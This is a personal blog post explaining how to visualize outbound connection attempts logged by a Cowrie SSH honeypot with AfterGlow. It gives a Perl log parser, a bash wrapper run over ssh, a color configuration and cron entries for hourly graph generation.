I’ve been receiving a few questions on how to produce the AfterGlow diagrams from Cowrie logs, described in an earlier blog post. Instead of repeating myself through email requests, an explanation here will be better.

First of all, you will need to decide what you want to visualize. Showing the different attackers targeting a Cowrie honeypot has limited value (and can be visualized with something much simpler than AfterGlow). Showing the next steps of the intruders, however, is a job well suited for AfterGlow.

Based on the intruders’ behaviour in Cowrie, where a few intruders use a limited number of ports to try to connect to multiple target IPs, the CSV input to AfterGlow should reflect this, so we’ll need the following format:

source_IP,dest_port,dest_IP

 

Below is a Cowrie log line showing that the intruder from IP 5.45.87.184 attempts to contact the target IP 216.58.210.36 on port 443 (formatted for readability):

2017-01-16 15:32:30+0100 [SSHService ssh-connection on
HoneyPotSSHTransport,9704,5.45.87.184] direct-tcp connection
request to 216.58.210.36:443 from localhost:5556

 

To convert this into CSV that AfterGlow will accept, I wrote a short parser script. This can be done in most languages; I used Perl:

#!/usr/bin/perl

use strict;
use warnings;

while (<>) {
 if ($_ =~ /HoneyPotSSHTransport,\d+,(.*?)\].* to (.*?):(\d+) /) {
  print "$1,$3,$2\n"
 }
}

 

The Perl code was saved as /usr/local/bin/cowrie2csv.pl on the host running Cowrie.

Since I'm creating the graphs on a different server than where Cowrie is running, I wrote a bash wrapper to tie it all together. Note the quotes that separate what's run locally from what's run on the Cowrie server.

#!/bin/bash

MYDATE=$(date +%Y-%m-%d)
if [ "$1" = "yesterday" ]; then
 MYDATE=$(date +%Y-%m-%d -d yesterday)
fi

ssh honeypot "grep '${MYDATE}.*direct-tcp connection request' \
 /home/cowrie/log/cowrie.log* | \
 /usr/local/bin/cowrie2csv.pl" | \
 /usr/local/bin/afterglow.pl \
 -c /usr/local/etc/afterglow/color.properties | \
 /usr/bin/neato -T png > \
 /var/www/html/cowrie-afterglow-${MYDATE}.png

 

The color.properties file contains my AfterGlow preferences for this kind of diagrams, and contains the following:

color.source="red"
color.edge="lightgrey"
color.event="lightblue"
color.target="yellow"

maxnodesize=1;
size.source=$sourceCount{$sourceName};
size.event=$eventCount{$eventName};
size.target=$targetCount{$targetName};
size=0.2
sum.source=0;
shape.target=triangle

 

Now everything can be added to Cron for continuously updated graphs. I’m running the bash script once an hour through the day, and then just after midnight with the “yesterday” argument so that yesterday’s graphs are completed. These are the contents of /etc/cron.d/cowrie-afterglow:

15  * * * * root /usr/local/bin/cowrie2afterglow.sh
10 00 * * * root /usr/local/bin/cowrie2afterglow.sh yesterday

 

 

Now, depending on the popularity of your honeypot, you may or may not get useful graphs. Below is a graph showing 24 hours of outbound connection attempts from my honeypot; with this much activity it could make sense to limit the input data.

AfterGlow diagram of Cowrie outbound activity


Written by bjorn on January 17th, 2017
